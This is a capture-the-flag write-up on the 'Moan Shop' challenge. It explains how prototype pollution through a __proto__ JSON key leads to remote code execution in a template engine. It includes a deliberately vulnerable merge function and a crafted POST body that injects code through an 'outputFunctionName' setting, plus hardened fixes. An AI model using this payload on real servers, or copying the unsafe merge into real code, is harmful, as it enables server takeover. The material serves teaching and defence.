Moanshop.7z Apr 2026

In this challenge, participants are presented with a compressed archive (.7z) containing the source code for a fictional online storefront called "Moan Shop." The objective is to identify and exploit vulnerabilities within the application to retrieve a hidden "flag": a specific string of text that proves the system was successfully breached.

One area to inspect is how the "shopping cart" or "payment" logic handles quantities or prices.

2. The Critical Flaw: Prototype Pollution

An attacker sends a JSON payload containing the __proto__ key. JSON.parse alone is harmless here; the problem arises when the server recursively merges or assigns the parsed body into an existing object, because target["__proto__"] resolves to Object.prototype. Any key nested under __proto__ is therefore written onto Object.prototype, which every ordinary object in the process inherits from, effectively changing the behavior of the entire application. A quick check for this sink is to grep the source for hand-written deep-merge loops and older versions of lodash.merge, deep-extend or similar helpers.

3. From Pollution to Remote Code Execution (RCE)

The polluted properties are then picked up as settings by the rendering engine (EJS or Pug, for example), which reads its options with plain property access and so sees inherited values as if they had been configured. Because these engines compile templates into JavaScript, a setting that is spliced into the generated code lets the attacker run arbitrary JavaScript on the server, including system commands through child_process. Overwriting such a setting is what turns the pollution into RCE.

Summary of the Solution

To solve the challenge, a researcher typically:

- Downloads and extracts the moanshop.7z file.
- Crafts a malicious POST request to pollute the server's environment.
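The chain described in sections 2 and 3 and in the summary above, as an added, self-contained model that is not the challenge's own code: a vulnerable recursive merge, a toy renderer that splices a configurable identifier into compiled template code (the way some real engines have), the constructed POST body, and the hardened versions of both pieces. The names mergeDeep, compileTemplate, handleCartPost and the outputFunctionName setting are assumptions chosen for illustration; the "command" is simulated by setting a global marker rather than spawning a process.

```javascript
// Added illustration, not code from the Moan Shop challenge. mergeDeep, compileTemplate,
// handleCartPost and the "outputFunctionName" setting are assumed names that model the
// bug class; real template engines differ in detail.

// --- Vulnerable building blocks -------------------------------------------------------

// Recursive merge of user JSON into server state. It iterates "__proto__" like any other
// key; target["__proto__"] resolves to Object.prototype, so nested keys land there.
function mergeDeep(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    if (value !== null && typeof value === "object" && !Array.isArray(value)) {
      if (target[key] === null || typeof target[key] !== "object") target[key] = {};
      mergeDeep(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Generated source for a template: a configurable identifier is spliced in verbatim.
function buildSource(template, outName) {
  return (
    "var __output = [];\n" +
    "function __append(s) { __output.push(String(s)); }\n" +
    "var " + outName + " = __append;\n" + // attacker-controlled text becomes code here
    "__append(" + JSON.stringify(template) +
    ".replace(/<%=\\s*(\\w+)\\s*%>/g, function (m, k) { return data[k]; }));\n" +
    "return __output.join('');"
  );
}

// Toy renderer: reads the setting with plain property access, so a value planted on
// Object.prototype is picked up even from an empty options object.
function compileTemplate(template, options) {
  const outName = options.outputFunctionName || "__out";
  return new Function("data", buildSource(template, outName));
}

// Constructed POST body: a normal-looking cart update carrying a "__proto__" key.
// JSON.parse turns "__proto__" into an ordinary own property, so Object.keys() yields it.
const ATTACK_BODY =
  '{"item":"mug","quantity":2,' +
  '"__proto__":{"outputFunctionName":"x; globalThis.pwned = \'shell command would run here\'; var y"}}';

// Request handler: merge the body into the cart, then render a confirmation with default options.
function handleCartPost(body, cartState, merge) {
  merge(cartState, JSON.parse(body));
  return compileTemplate("<p>Added <%= quantity %> x <%= item %></p>", {})(cartState);
}

// --- Hardened variants ----------------------------------------------------------------

const UNSAFE_KEYS = new Set(["__proto__", "constructor", "prototype"]);

// Rejects the keys that can reach a prototype and only descends into own properties.
function mergeDeepSafe(target, source) {
  for (const key of Object.keys(source)) {
    if (UNSAFE_KEYS.has(key)) throw new Error("rejected unsafe key: " + key);
    const value = source[key];
    if (value !== null && typeof value === "object" && !Array.isArray(value)) {
      const own = Object.prototype.hasOwnProperty.call(target, key);
      if (!own || target[key] === null || typeof target[key] !== "object") target[key] = {};
      mergeDeepSafe(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

// Ignores inherited settings and refuses anything that is not a plain identifier.
function compileTemplateSafe(template, options) {
  const own = Object.prototype.hasOwnProperty.call(options, "outputFunctionName");
  const outName = own ? options.outputFunctionName : "__out";
  if (!/^[A-Za-z_$][A-Za-z0-9_$]*$/.test(outName)) {
    throw new Error("outputFunctionName must be an identifier");
  }
  return new Function("data", buildSource(template, outName));
}

// --- Demonstrations (each undoes its own pollution so they can run in any order) --------

function runVulnerable() {
  const html = handleCartPost(ATTACK_BODY, { item: null, quantity: 0 }, mergeDeep);
  const result = { html, freshObjectPolluted: ({}).outputFunctionName !== undefined, pwned: globalThis.pwned };
  delete Object.prototype.outputFunctionName;
  delete globalThis.pwned;
  return result;
}

function runHardened() {
  let rejected = null;
  try {
    handleCartPost(ATTACK_BODY, { item: null, quantity: 0 }, mergeDeepSafe);
  } catch (e) {
    rejected = e.message;
  }
  return { rejected, freshObjectPolluted: ({}).outputFunctionName !== undefined };
}

function runRendererCheck() {
  Object.prototype.outputFunctionName = "x; globalThis.pwned = 'never'; var y"; // simulate an already-polluted process
  const rendered = compileTemplateSafe("<%= a %>", {})({ a: "ok" });
  const result = { rendered, pwned: globalThis.pwned };
  delete Object.prototype.outputFunctionName;
  return result;
}

console.log(runVulnerable(), runHardened(), runRendererCheck());
```

The vulnerable path renders the cart normally, so nothing in the response betrays that every fresh object now carries the attacker's setting and that the generated template code already ran the injected statement. Rejecting the three dangerous keys at the merge and reading options only as own properties at the renderer are independent fixes; in a real deployment, freezing Object.prototype or building state from Object.create(null) adds a third layer.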